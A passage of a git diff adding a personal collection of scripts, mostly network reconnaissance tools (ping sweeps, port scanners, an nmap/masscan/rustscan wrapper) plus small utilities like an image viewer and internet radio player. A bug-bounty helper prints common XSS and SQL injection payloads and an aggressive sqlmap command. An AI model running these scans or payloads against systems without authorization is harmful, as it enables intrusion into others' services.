|
||||
|
||||
echo -e "\n${GREEN}✓${NC} Web recon complete! Results in: ${BOLD}$OUTPUT_DIR${NC}"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
url="$1"
|
||||
|
||||
# Validate URL
|
||||
if [[ -z "$url" ]]; then
|
||||
echo -e "${RED}Error:${NC} URL required"
|
||||
echo "Usage: web-recon <url>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Check tools
|
||||
check_tools
|
||||
|
||||
# Run web reconnaissance
|
||||
run_web_recon "$url"
|
||||
43
scripts/ping-sweep.py
Normal file
43
scripts/ping-sweep.py
Normal file
|
|
@ -0,0 +1,43 @@
|
|||
#!/usr/bin/python3
|
||||
|
||||
import sys
|
||||
import subprocess
|
||||
|
||||
|
||||
def ping_sweep(network_prefix):
|
||||
live_hosts = []
|
||||
|
||||
for i in range(1, 254):
|
||||
ip = f'{network_prefix}.{i}'
|
||||
print(f'Pinging {ip}...', end='')
|
||||
result = subprocess.run(
|
||||
['ping', '-c', '1', '-W', '1', ip],
|
||||
stdout=subprocess.DEVNULL
|
||||
)
|
||||
if result.returncode == 0:
|
||||
print('Host is up')
|
||||
live_hosts.append(ip)
|
||||
else:
|
||||
print('No response')
|
||||
|
||||
return live_hosts
|
||||
|
||||
# Usage
|
||||
# hosts = ping_sweep('192.168.1')
|
||||
# print('\nLive hosts:')
|
||||
# print('\n'.join(hosts))
|
||||
|
||||
|
||||
# Entry point
|
||||
if __name__ == "__main__":
|
||||
if len(sys.argv) < 2:
|
||||
print("Usage: python3 pingsweep.py <network_prefix>")
|
||||
print("Example: python3 pingsweep.py 192.168.1")
|
||||
sys.exit(1)
|
||||
|
||||
prefix = sys.argv[1]
|
||||
hosts = ping_sweep(prefix)
|
||||
|
||||
print("\nLive hosts:")
|
||||
for host in hosts:
|
||||
print(host)
|
||||
9
scripts/ping-sweep.sh
Normal file
9
scripts/ping-sweep.sh
Normal file
|
|
@ -0,0 +1,9 @@
|
|||
#!/bin/bash
|
||||
|
||||
# ip=$1
|
||||
|
||||
echo "Scanning..."
|
||||
for ip in $(seq 1 255); do
|
||||
ping -c 1 -W 1 192.168.1.$ip | grep "64 bytes" | awk '{print $4}' | tr -d ':'
|
||||
done
|
||||
|
||||
19
scripts/pix
Executable file
19
scripts/pix
Executable file
|
|
@ -0,0 +1,19 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: pix
|
||||
# Description: View images in terminal with mpv
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: pix image.jpg
|
||||
# pix *.png
|
||||
# pix ~/Pictures/
|
||||
|
||||
if ! command -v mpv &>/dev/null; then
|
||||
echo "Error: mpv not found. Install with: sudo apt install mpv" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
exec mpv \
|
||||
--image-display-duration=inf \
|
||||
--loop-file=inf \
|
||||
"$@"
|
||||
55
scripts/port-scanner.py
Executable file
55
scripts/port-scanner.py
Executable file
|
|
@ -0,0 +1,55 @@
|
|||
#!/usr/bin/python3
|
||||
|
||||
import socket
|
||||
import common_ports
|
||||
import re
|
||||
|
||||
|
||||
def get_open_ports(target, port_range, verbose=False):
|
||||
open_ports = []
|
||||
|
||||
# Try resolving the target
|
||||
try:
|
||||
ip_addr = socket.gethostbyname(target)
|
||||
except socket.gaierror:
|
||||
if re.match(r'^\d{1,3}(\.\d{1,3}){3}$', target):
|
||||
return "Error: Invalid IP address"
|
||||
else:
|
||||
return "Error: Invalid hostname"
|
||||
|
||||
# Build the list of ports from range
|
||||
ports_list = list(range(port_range[0], port_range[1] + 1))
|
||||
|
||||
for port in ports_list:
|
||||
try:
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.settimeout(1)
|
||||
result = s.connect_ex((ip_addr, port))
|
||||
if result == 0:
|
||||
open_ports.append(port)
|
||||
s.close()
|
||||
except:
|
||||
continue
|
||||
|
||||
# Output
|
||||
if verbose:
|
||||
try:
|
||||
hostname = socket.gethostbyaddr(ip_addr)[0]
|
||||
except socket.herror:
|
||||
hostname = target
|
||||
|
||||
output = f"Open ports for {hostname} ({ip_addr})\nPORT SERVICE\n"
|
||||
try:
|
||||
import common_ports
|
||||
for port in open_ports:
|
||||
service = common_ports.ports_and_services.get(port, 'unknown')
|
||||
output += f"{port:<9}{service}\n"
|
||||
except ImportError:
|
||||
for port in open_ports:
|
||||
output += f"{port:<9}unknown\n"
|
||||
return output.strip()
|
||||
|
||||
return open_ports
|
||||
|
||||
|
||||
print(get_open_ports("scanme.nmap.org", [20, 80], verbose=True))
|
||||
226
scripts/ports
Executable file
226
scripts/ports
Executable file
|
|
@ -0,0 +1,226 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: ports
|
||||
# Description: Enhanced port viewer with colors, filtering, and process info
|
||||
# Usage: ports # Show all ports (colorized)
|
||||
# ports -l # Listening only (most common)
|
||||
# ports -p # Show process names
|
||||
# ports 80 # Find what's on port 80
|
||||
# ports tcp # TCP only
|
||||
# ports udp # UDP only
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly RED='\033[0;31m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "\033[1mports\033[0m - Enhanced Port Viewer v${VERSION}"
|
||||
echo
|
||||
echo -e "\033[1mUSAGE:\033[0m"
|
||||
echo " ports [OPTIONS] [PORT|PROTOCOL]"
|
||||
echo
|
||||
echo -e "\033[1mOPTIONS:\033[0m"
|
||||
echo -e " \033[0;36m-l, --listen\033[0m Show listening ports only (default)"
|
||||
echo -e " \033[0;36m-a, --all\033[0m Show all connections"
|
||||
echo -e " \033[0;36m-p, --process\033[0m Show process names/PIDs"
|
||||
echo -e " \033[0;36m-n, --numeric\033[0m Don't resolve hostnames"
|
||||
echo -e " \033[0;36m-h, --help\033[0m Show this help message"
|
||||
echo
|
||||
echo -e "\033[1mFILTERS:\033[0m"
|
||||
echo " ports 80 # Show what's on port 80"
|
||||
echo " ports tcp # TCP connections only"
|
||||
echo " ports udp # UDP connections only"
|
||||
echo " ports 8000-9000 # Port range"
|
||||
echo
|
||||
echo -e "\033[1mEXAMPLES:\033[0m"
|
||||
echo " ports # Listening ports (colorized)"
|
||||
echo " ports -p # With process info"
|
||||
echo " ports -a # All connections"
|
||||
echo " ports 443 # What's on HTTPS port"
|
||||
echo " ports tcp -p # TCP with processes"
|
||||
echo
|
||||
echo -e "\033[1mCOLOR LEGEND:\033[0m"
|
||||
echo -e " \033[0;32mLISTEN\033[0m - Listening for connections"
|
||||
echo -e " \033[0;34mESTABLISHED\033[0m - Active connection"
|
||||
echo -e " \033[1;33mTIME_WAIT\033[0m - Connection closing"
|
||||
echo -e " \033[0;31mCLOSE_WAIT\033[0m - Waiting to close"
|
||||
}
|
||||
|
||||
# Colorize state
|
||||
colorize_state() {
|
||||
local state=$1
|
||||
case "$state" in
|
||||
LISTEN)
|
||||
echo -e "${GREEN}${state}${NC}"
|
||||
;;
|
||||
ESTABLISHED)
|
||||
echo -e "${BLUE}${state}${NC}"
|
||||
;;
|
||||
TIME_WAIT|CLOSE_WAIT)
|
||||
echo -e "${YELLOW}${state}${NC}"
|
||||
;;
|
||||
SYN_SENT|SYN_RECV)
|
||||
echo -e "${CYAN}${state}${NC}"
|
||||
;;
|
||||
*)
|
||||
echo "$state"
|
||||
;;
|
||||
esac
|
||||
}
|
||||
|
||||
# Check if port is "interesting" (not in common_ports)
|
||||
is_unusual_port() {
|
||||
local port=$1
|
||||
local common_ports=(20 21 22 23 25 53 80 110 143 443 465 587 993 995 3306 5432 6379 8080 8443)
|
||||
|
||||
for p in "${common_ports[@]}"; do
|
||||
if [[ "$port" == "$p" ]]; then
|
||||
return 1
|
||||
fi
|
||||
done
|
||||
return 0
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
show_listen_only=true
|
||||
show_process=false
|
||||
numeric=true
|
||||
filter_proto=""
|
||||
filter_port=""
|
||||
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case $1 in
|
||||
-l|--listen)
|
||||
show_listen_only=true
|
||||
shift
|
||||
;;
|
||||
-a|--all)
|
||||
show_listen_only=false
|
||||
shift
|
||||
;;
|
||||
-p|--process)
|
||||
show_process=true
|
||||
shift
|
||||
;;
|
||||
-n|--numeric)
|
||||
numeric=true
|
||||
shift
|
||||
;;
|
||||
-h|--help)
|
||||
show_help
|
||||
exit 0
|
||||
;;
|
||||
tcp|TCP)
|
||||
filter_proto="tcp"
|
||||
shift
|
||||
;;
|
||||
udp|UDP)
|
||||
filter_proto="udp"
|
||||
shift
|
||||
;;
|
||||
[0-9]*)
|
||||
filter_port="$1"
|
||||
shift
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown option: $1" >&2
|
||||
echo "Run 'ports --help' for usage information" >&2
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
# Build ss command
|
||||
ss_cmd="ss -tuln"
|
||||
|
||||
if [[ "$show_listen_only" == "false" ]]; then
|
||||
ss_cmd="ss -tun"
|
||||
fi
|
||||
|
||||
if [[ "$show_process" == "true" ]]; then
|
||||
ss_cmd="sudo ss -tulnp"
|
||||
if [[ "$show_listen_only" == "false" ]]; then
|
||||
ss_cmd="sudo ss -tunp"
|
||||
fi
|
||||
fi
|
||||
|
||||
# Execute and format
|
||||
output=$($ss_cmd)
|
||||
|
||||
# Header
|
||||
echo -e "${BOLD}${CYAN}Active Ports${NC}"
|
||||
echo -e "${BOLD}────────────────────────────────────────────────────────────${NC}"
|
||||
|
||||
# Parse and colorize output
|
||||
echo "$output" | awk -v show_proc="$show_process" -v filter_proto="$filter_proto" -v filter_port="$filter_port" '
|
||||
NR==1 { next } # Skip header from ss
|
||||
|
||||
{
|
||||
proto = $1
|
||||
state = $2
|
||||
local = $5
|
||||
peer = $6
|
||||
process = ""
|
||||
|
||||
# Extract process info if available (last field)
|
||||
if (show_proc == "true" && NF >= 7) {
|
||||
for (i=7; i<=NF; i++) {
|
||||
process = process $i " "
|
||||
}
|
||||
}
|
||||
|
||||
# Filter by protocol
|
||||
if (filter_proto != "" && tolower(proto) !~ tolower(filter_proto)) next
|
||||
|
||||
# Extract port from local address
|
||||
split(local, parts, ":")
|
||||
port = parts[length(parts)]
|
||||
|
||||
# Filter by port
|
||||
if (filter_port != "" && port != filter_port) next
|
||||
|
||||
# Print formatted line
|
||||
printf "%-6s %-12s %-25s %-25s", proto, state, local, peer
|
||||
|
||||
if (process != "") {
|
||||
printf " %s", process
|
||||
}
|
||||
|
||||
printf "\n"
|
||||
}
|
||||
' | while IFS= read -r line; do
|
||||
# Colorize based on state
|
||||
if [[ "$line" =~ LISTEN ]]; then
|
||||
echo -e "$line" | sed "s/LISTEN/${GREEN}LISTEN${NC}/"
|
||||
elif [[ "$line" =~ ESTABLISHED ]]; then
|
||||
echo -e "$line" | sed "s/ESTABLISHED/${BLUE}ESTABLISHED${NC}/"
|
||||
elif [[ "$line" =~ TIME_WAIT ]]; then
|
||||
echo -e "$line" | sed "s/TIME_WAIT/${YELLOW}TIME_WAIT${NC}/"
|
||||
elif [[ "$line" =~ CLOSE_WAIT ]]; then
|
||||
echo -e "$line" | sed "s/CLOSE_WAIT/${RED}CLOSE_WAIT${NC}/"
|
||||
else
|
||||
echo "$line"
|
||||
fi
|
||||
done
|
||||
|
||||
# Summary
|
||||
echo
|
||||
echo -e "${BOLD}${CYAN}Summary:${NC}"
|
||||
total=$(echo "$output" | wc -l)
|
||||
echo " Total connections: $((total - 1))"
|
||||
|
||||
if [[ "$show_listen_only" == "true" ]]; then
|
||||
echo -e " ${GREEN}Tip:${NC} Use 'ports -a' to see all connections"
|
||||
fi
|
||||
|
||||
if [[ "$show_process" == "false" ]]; then
|
||||
echo -e " ${GREEN}Tip:${NC} Use 'ports -p' to see process information"
|
||||
fi
|
||||
10
scripts/prettypath
Executable file
10
scripts/prettypath
Executable file
|
|
@ -0,0 +1,10 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: prettypath
|
||||
# Description: Display $PATH with one directory per line
|
||||
# Source: https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: prettypath
|
||||
|
||||
echo "$PATH" | sed 's/:/\
|
||||
/g'
|
||||
250
scripts/pscan
Executable file
250
scripts/pscan
Executable file
|
|
@ -0,0 +1,250 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: pscan
|
||||
# Description: Unified port scanner wrapper (nmap/masscan/rustscan)
|
||||
# Usage: pscan <target> # Quick scan with best available tool
|
||||
# pscan <target> -f # Full port scan (all 65535)
|
||||
# pscan <target> -u # UDP scan
|
||||
# pscan <target> -v # Version detection
|
||||
# pscan <target> -s # Stealth scan
|
||||
|
||||
VERSION="1.0.0"
|
||||
|
||||
# Colors
|
||||
readonly RED='\033[0;31m'
|
||||
readonly GREEN='\033[0;32m'
|
||||
readonly YELLOW='\033[1;33m'
|
||||
readonly BLUE='\033[0;34m'
|
||||
readonly CYAN='\033[0;36m'
|
||||
readonly MAGENTA='\033[0;35m'
|
||||
readonly BOLD='\033[1m'
|
||||
readonly NC='\033[0m'
|
||||
|
||||
show_help() {
|
||||
echo -e "${BOLD}pscan${NC} - Unified Port Scanner Wrapper v${VERSION}"
|
||||
echo
|
||||
echo -e "${BOLD}USAGE:${NC}"
|
||||
echo " pscan <target> [OPTIONS]"
|
||||
echo
|
||||
echo -e "${BOLD}OPTIONS:${NC}"
|
||||
echo -e " ${CYAN}-f, --full${NC} Scan all 65535 ports"
|
||||
echo -e " ${CYAN}-t, --top${NC} Scan top 1000 ports (default)"
|
||||
echo -e " ${CYAN}-q, --quick${NC} Quick scan (top 100 ports)"
|
||||
echo -e " ${CYAN}-u, --udp${NC} UDP scan"
|
||||
echo -e " ${CYAN}-v, --version${NC} Version detection"
|
||||
echo -e " ${CYAN}-s, --stealth${NC} Stealth SYN scan"
|
||||
echo -e " ${CYAN}-a, --aggressive${NC} Aggressive scan (OS, version, scripts, traceroute)"
|
||||
echo -e " ${CYAN}-o, --output FILE${NC} Save output to file"
|
||||
echo -e " ${CYAN}-h, --help${NC} Show this help"
|
||||
echo
|
||||
echo -e "${BOLD}TOOL PREFERENCE:${NC}"
|
||||
echo " 1. rustscan (fastest, if available)"
|
||||
echo " 2. masscan (fast, if available)"
|
||||
echo " 3. nmap (fallback, always available)"
|
||||
echo
|
||||
echo -e "${BOLD}EXAMPLES:${NC}"
|
||||
echo " pscan 192.168.1.1 # Quick scan"
|
||||
echo " pscan 192.168.1.0/24 # Scan subnet"
|
||||
echo " pscan 10.10.10.5 -f # Full port scan"
|
||||
echo " pscan target.com -v # Version detection"
|
||||
echo " pscan 10.0.0.1 -s # Stealth scan"
|
||||
echo " pscan 192.168.1.1 -o scan.txt # Save output"
|
||||
echo
|
||||
echo -e "${BOLD}INSTALLED TOOLS:${NC}"
|
||||
command -v rustscan &>/dev/null && echo -e " ${GREEN}✓${NC} rustscan" || echo -e " ${RED}✗${NC} rustscan (install: cargo install rustscan)"
|
||||
command -v masscan &>/dev/null && echo -e " ${GREEN}✓${NC} masscan" || echo -e " ${RED}✗${NC} masscan (install: sudo apt install masscan)"
|
||||
command -v nmap &>/dev/null && echo -e " ${GREEN}✓${NC} nmap" || echo -e " ${RED}✗${NC} nmap (install: sudo apt install nmap)"
|
||||
}
|
||||
|
||||
# Detect best scanner
|
||||
get_scanner() {
|
||||
if command -v rustscan &>/dev/null; then
|
||||
echo "rustscan"
|
||||
elif command -v masscan &>/dev/null; then
|
||||
echo "masscan"
|
||||
elif command -v nmap &>/dev/null; then
|
||||
echo "nmap"
|
||||
else
|
||||
echo -e "${RED}Error:${NC} No port scanner found" >&2
|
||||
echo "Install one: sudo apt install nmap masscan" >&2
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Rustscan wrapper
|
||||
scan_rustscan() {
|
||||
local target="$1"
|
||||
local ports="${2:-1-65535}"
|
||||
local extra_args="${3:-}"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Using rustscan for ${BOLD}$target${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Ports: $ports"
|
||||
echo
|
||||
|
||||
rustscan -a "$target" -r "$ports" --ulimit 5000 $extra_args
|
||||
}
|
||||
|
||||
# Masscan wrapper
|
||||
scan_masscan() {
|
||||
local target="$1"
|
||||
local ports="${2:-0-65535}"
|
||||
local rate="${3:-1000}"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Using masscan for ${BOLD}$target${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Ports: $ports | Rate: $rate pps"
|
||||
echo
|
||||
|
||||
sudo masscan "$target" -p"$ports" --rate="$rate" --open
|
||||
}
|
||||
|
||||
# Nmap wrapper
|
||||
scan_nmap() {
|
||||
local target="$1"
|
||||
local scan_type="${2:--sS}"
|
||||
local ports="${3:--p-}"
|
||||
local extra_args="${4:-}"
|
||||
|
||||
echo -e "${CYAN}[*]${NC} Using nmap for ${BOLD}$target${NC}"
|
||||
echo -e "${CYAN}[*]${NC} Scan type: $scan_type | Ports: $ports"
|
||||
echo
|
||||
|
||||
sudo nmap "$scan_type" "$ports" $extra_args "$target"
|
||||
}
|
||||
|
||||
# Parse arguments
|
||||
if [[ $# -eq 0 ]] || [[ "$1" =~ ^(-h|--help|help)$ ]]; then
|
||||
show_help
|
||||
exit 0
|
||||
fi
|
||||
|
||||
target="$1"
|
||||
shift
|
||||
|
||||
# Default settings
|
||||
mode="top"
|
||||
scan_type="tcp"
|
||||
output_file=""
|
||||
scanner=$(get_scanner)
|
||||
aggressive=false
|
||||
version_detect=false
|
||||
stealth=false
|
||||
|
||||
# Parse options
|
||||
while [[ $# -gt 0 ]]; do
|
||||
case $1 in
|
||||
-f|--full)
|
||||
mode="full"
|
||||
shift
|
||||
;;
|
||||
-t|--top)
|
||||
mode="top"
|
||||
shift
|
||||
;;
|
||||
-q|--quick)
|
||||
mode="quick"
|
||||
shift
|
||||
;;
|
||||
-u|--udp)
|
||||
scan_type="udp"
|
||||
shift
|
||||
;;
|
||||
-v|--version)
|
||||
version_detect=true
|
||||
shift
|
||||
;;
|
||||
-s|--stealth)
|
||||
stealth=true
|
||||
shift
|
||||
;;
|
||||
-a|--aggressive)
|
||||
aggressive=true
|
||||
shift
|
||||
;;
|
||||
-o|--output)
|
||||
output_file="$2"
|
||||
shift 2
|
||||
;;
|
||||
*)
|
||||
echo -e "${RED}Error:${NC} Unknown option: $1"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
done
|
||||
|
||||
# Build scan command based on scanner and options
|
||||
case "$scanner" in
|
||||
rustscan)
|
||||
case "$mode" in
|
||||
full)
|
||||
ports="1-65535"
|
||||
;;
|
||||
top)
|
||||
ports="1-10000"
|
||||
;;
|
||||
quick)
|
||||
ports="1-1000"
|
||||
;;
|
||||
esac
|
||||
|
||||
extra_args=""
|
||||
[[ -n "$output_file" ]] && extra_args="$extra_args -o $output_file"
|
||||
|
||||
scan_rustscan "$target" "$ports" "$extra_args"
|
||||
;;
|
||||
|
||||
masscan)
|
||||
case "$mode" in
|
||||
full)
|
||||
ports="0-65535"
|
||||
rate="10000"
|
||||
;;
|
||||
top)
|
||||
ports="1-10000"
|
||||
rate="5000"
|
||||
;;
|
||||
quick)
|
||||
ports="1-1000"
|
||||
rate="1000"
|
||||
;;
|
||||
esac
|
||||
|
||||
[[ -n "$output_file" ]] && extra_args="$extra_args -oL $output_file"
|
||||
|
||||
scan_masscan "$target" "$ports" "$rate"
|
||||
;;
|
||||
|
||||
nmap)
|
||||
# Build nmap arguments
|
||||
if [[ "$stealth" == "true" ]]; then
|
||||
nmap_scan="-sS"
|
||||
elif [[ "$scan_type" == "udp" ]]; then
|
||||
nmap_scan="-sU"
|
||||
else
|
||||
nmap_scan="-sS"
|
||||
fi
|
||||
|
||||
case "$mode" in
|
||||
full)
|
||||
nmap_ports="-p-"
|
||||
;;
|
||||
top)
|
||||
nmap_ports="--top-ports 1000"
|
||||
;;
|
||||
quick)
|
||||
nmap_ports="--top-ports 100"
|
||||
;;
|
||||
esac
|
||||
|
||||
nmap_extra=""
|
||||
[[ "$version_detect" == "true" ]] && nmap_extra="$nmap_extra -sV"
|
||||
[[ "$aggressive" == "true" ]] && nmap_extra="$nmap_extra -A"
|
||||
[[ -n "$output_file" ]] && nmap_extra="$nmap_extra -oN $output_file"
|
||||
|
||||
scan_nmap "$target" "$nmap_scan" "$nmap_ports" "$nmap_extra"
|
||||
;;
|
||||
esac
|
||||
|
||||
echo
|
||||
echo -e "${GREEN}[✓]${NC} Scan complete"
|
||||
[[ -n "$output_file" ]] && echo -e "${GREEN}[✓]${NC} Output saved to: $output_file"
|
||||
74
scripts/quick-vuln-test.sh
Executable file
74
scripts/quick-vuln-test.sh
Executable file
|
|
@ -0,0 +1,74 @@
|
|||
#!/usr/bin/env bash
|
||||
# Quick vulnerability testing helper
|
||||
# Usage: quick-vuln-test.sh <url> <type>
|
||||
# Types: xss, sqli, idor, csrf
|
||||
|
||||
set -euo pipefail
|
||||
|
||||
URL="${1:-}"
|
||||
TYPE="${2:-}"
|
||||
|
||||
if [[ -z "$URL" ]] || [[ -z "$TYPE" ]]; then
|
||||
echo "Usage: $0 <url> <type>"
|
||||
echo "Types: xss, sqli, idor, csrf"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
case "$TYPE" in
|
||||
xss)
|
||||
echo "[+] Testing for XSS..."
|
||||
echo "[+] Basic payload: <script>alert(1)</script>"
|
||||
echo "[+] Image payload: <img src=x onerror=alert(1)>"
|
||||
echo "[+] SVG payload: <svg onload=alert(1)>"
|
||||
echo ""
|
||||
echo "[!] Test these in Burp Suite or manually"
|
||||
echo "[!] Document which ones work in your findings"
|
||||
;;
|
||||
|
||||
sqli)
|
||||
echo "[+] Testing for SQL Injection..."
|
||||
echo "[+] Basic test: '"
|
||||
echo "[+] Boolean test: ' OR '1'='1"
|
||||
echo "[+] UNION test: ' UNION SELECT NULL--"
|
||||
echo "[+] Time-based: ' AND SLEEP(5)--"
|
||||
echo ""
|
||||
echo "[!] Use sqlmap for automated testing:"
|
||||
echo "sqlmap -u '$URL' --batch --risk=3 --level=5"
|
||||
;;
|
||||
|
||||
idor)
|
||||
echo "[+] Testing for IDOR..."
|
||||
echo "[+] 1. Create two test accounts"
|
||||
echo "[+] 2. Log in as User A, identify resource ID"
|
||||
echo "[+] 3. Log in as User B, try to access User A's resource"
|
||||
echo "[+] 4. Check if authorization is enforced"
|
||||
echo ""
|
||||
echo "[!] Use Burp Suite to intercept and modify requests"
|
||||
echo "[!] Look for IDs in: URL params, POST body, JSON, cookies"
|
||||
;;
|
||||
|
||||
csrf)
|
||||
echo "[+] Testing for CSRF..."
|
||||
echo "[+] 1. Find state-changing action (password change, email update)"
|
||||
echo "[+] 2. Intercept request in Burp Suite"
|
||||
echo "[+] 3. Check for CSRF token in request"
|
||||
echo "[+] 4. Remove token and replay - does it still work?"
|
||||
echo "[+] 5. Check SameSite cookie attribute"
|
||||
echo ""
|
||||
echo "[!] If no CSRF protection, create PoC HTML page"
|
||||
;;
|
||||
|
||||
*)
|
||||
echo "[-] Unknown vulnerability type: $TYPE"
|
||||
echo "Types: xss, sqli, idor, csrf"
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
|
||||
echo ""
|
||||
echo "[+] When you find a vulnerability:"
|
||||
echo " 1. Take screenshots (Flameshot)"
|
||||
echo " 2. Document PoC steps"
|
||||
echo " 3. Copy template: cp ~/.claude/context/business/security/bug-bounty/templates/<type>.json ~/bug-bounty/discoveries/"
|
||||
echo " 4. Fill in [BRACKETED] fields"
|
||||
echo " 5. Generate report: bun run ~/.claude/context/business/security/bug-bounty/latex/generate.ts"
|
||||
111
scripts/radio
Executable file
111
scripts/radio
Executable file
|
|
@ -0,0 +1,111 @@
|
|||
#!/usr/bin/env bash
|
||||
set -euo pipefail
|
||||
|
||||
# Script Name: radio
|
||||
# Description: Internet radio station wrapper with curated stations
|
||||
# Source: Inspired by https://evanhahn.com/scripts-i-wrote-that-i-use-all-the-time/
|
||||
# Usage: radio <station-name>
|
||||
# radio list
|
||||
|
||||
# Check for mpv
|
||||
if ! command -v mpv &>/dev/null; then
|
||||
echo "Error: mpv not found. Install with: sudo apt install mpv" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Curated radio stations
|
||||
declare -A stations=(
|
||||
# Rock & Metal
|
||||
["metal"]="http://listen.181fm.com/181-greatoldies_128k.mp3|Heavy Metal & Hard Rock"
|
||||
["rock"]="http://listen.181fm.com/181-rock_128k.mp3|Classic Rock"
|
||||
|
||||
# Cyberpunk / Synthwave / Darkwave
|
||||
["cyberpunk"]="https://stream.nightride.fm/nightride.mp3|Nightride FM - Synthwave/Retrowave/Outrun"
|
||||
["darksynth"]="https://stream.nightride.fm/darksynth.mp3|Darksynth/Cyberpunk/Synthmetal"
|
||||
["chillsynth"]="https://stream.nightride.fm/chillsynth.mp3|Chillsynth/Chillwave/Instrumental"
|
||||
["datawave"]="https://stream.nightride.fm/datawave.mp3|Glitchy Synthwave/IDM"
|
||||
["spacesynth"]="https://stream.nightride.fm/spacesynth.mp3|Spacesynth/Space Disco"
|
||||
["horrorsynth"]="https://stream.nightride.fm/horrorsynth.mp3|Horrorsynth/Witch House"
|
||||
["industrial"]="https://stream.nightride.fm/ebsm.mp3|Industrial/EBM/Midtempo"
|
||||
|
||||
# Electronic / Techno
|
||||
["techno"]="http://stream.laut.fm/technobase|Techno Base - Coding Beats"
|
||||
["dnb"]="https://stream.nightride.fm/rektfm.mp3|Drum & Bass/Dubstep/Techno/Trance"
|
||||
["lofi"]="https://stream.nightride.fm/chillsynth.mp3|Lo-Fi Chill Beats"
|
||||
|
||||
# Meditation / Ambient / Relaxation
|
||||
["meditation"]="https://streaming.radionomy.com/-zenoflm-|Zen FM - Meditation & Relaxation"
|
||||
["ambient"]="https://somafm.com/dronezone130.pls|SomaFM Drone Zone - Ambient"
|
||||
["sleep"]="https://somafm.com/deepspaceone130.pls|SomaFM Deep Space One"
|
||||
["nature"]="https://streaming.radionomy.com/NatureSoundsRelaxation|Nature Sounds"
|
||||
|
||||
# Classical
|
||||
["classical"]="https://stream.live.vc.bbcmedia.co.uk/bbc_radio_three|BBC Radio 3 - Classical"
|
||||
["piano"]="http://stream.laut.fm/piano-classics|Piano Classics"
|
||||
)
|
||||
|
||||
# List available stations
|
||||
if [[ $# -eq 0 ]] || [[ "$1" == "list" ]]; then
|
||||
echo "📻 Available Radio Stations:"
|
||||
echo ""
|
||||
echo "🤘 ROCK & METAL:"
|
||||
echo " radio metal - Heavy Metal & Hard Rock"
|
||||
echo " radio rock - Classic Rock"
|
||||
echo ""
|
||||
echo "🌃 CYBERPUNK / SYNTHWAVE:"
|
||||
echo " radio cyberpunk - Nightride FM (Synthwave/Retrowave)"
|
||||
echo " radio darksynth - Darksynth/Cyberpunk/Synthmetal"
|
||||
echo " radio chillsynth - Chillsynth/Chillwave"
|
||||
echo " radio datawave - Glitchy Synthwave/IDM"
|
||||
echo " radio spacesynth - Spacesynth/Space Disco"
|
||||
echo " radio horrorsynth- Horrorsynth/Witch House"
|
||||
echo " radio industrial - Industrial/EBM"
|
||||
echo ""
|
||||
echo "🎧 ELECTRONIC / TECHNO:"
|
||||
echo " radio techno - Techno Base (Coding Beats)"
|
||||
echo " radio dnb - Drum & Bass/Dubstep/Trance"
|
||||
echo " radio lofi - Lo-Fi Chill Beats"
|
||||
echo ""
|
||||
echo "🧘 MEDITATION / AMBIENT:"
|
||||
echo " radio meditation - Zen FM"
|
||||
echo " radio ambient - SomaFM Drone Zone"
|
||||
echo " radio sleep - Deep Space Ambient"
|
||||
echo " radio nature - Nature Sounds"
|
||||
echo ""
|
||||
echo "🎹 CLASSICAL:"
|
||||
echo " radio classical - BBC Radio 3"
|
||||
echo " radio piano - Piano Classics"
|
||||
echo ""
|
||||
exit 0
|
||||
fi
|
||||
|
||||
station="$1"
|
||||
|
||||
# Check if station exists
|
||||
if [[ -z "${stations[$station]:-}" ]]; then
|
||||
echo "Error: Station '$station' not found" >&2
|
||||
echo "Run 'radio list' to see available stations" >&2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Parse station URL and description
|
||||
IFS='|' read -r url description <<< "${stations[$station]}"
|
||||
|
||||
echo "📻 Tuning in to: $description"
|
||||
echo "🔊 Playing... (Ctrl+C to stop)"
|
||||
echo ""
|
||||
|
||||
# Play with mpv (only fallback to VLC if mpv is not installed or stream fails to start)
|
||||
if ! command -v mpv &>/dev/null; then
|
||||
echo "mpv not found. Trying VLC..." >&2
|
||||
if command -v vlc &>/dev/null; then
|
||||
vlc "$url" 2>/dev/null
|
||||
exit $?
|
||||
else
|
||||
echo "Error: Neither mpv nor VLC is installed" >&2
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
|
||||
# mpv will return non-zero for user interruption (Ctrl+C), which is normal
|
||||
mpv --no-video --volume=50 "$url"
|
||||
53
scripts/randomize-mac
Executable file
53
scripts/randomize-mac
Executable file
|
|
@ -0,0 +1,53 @@
|
|||
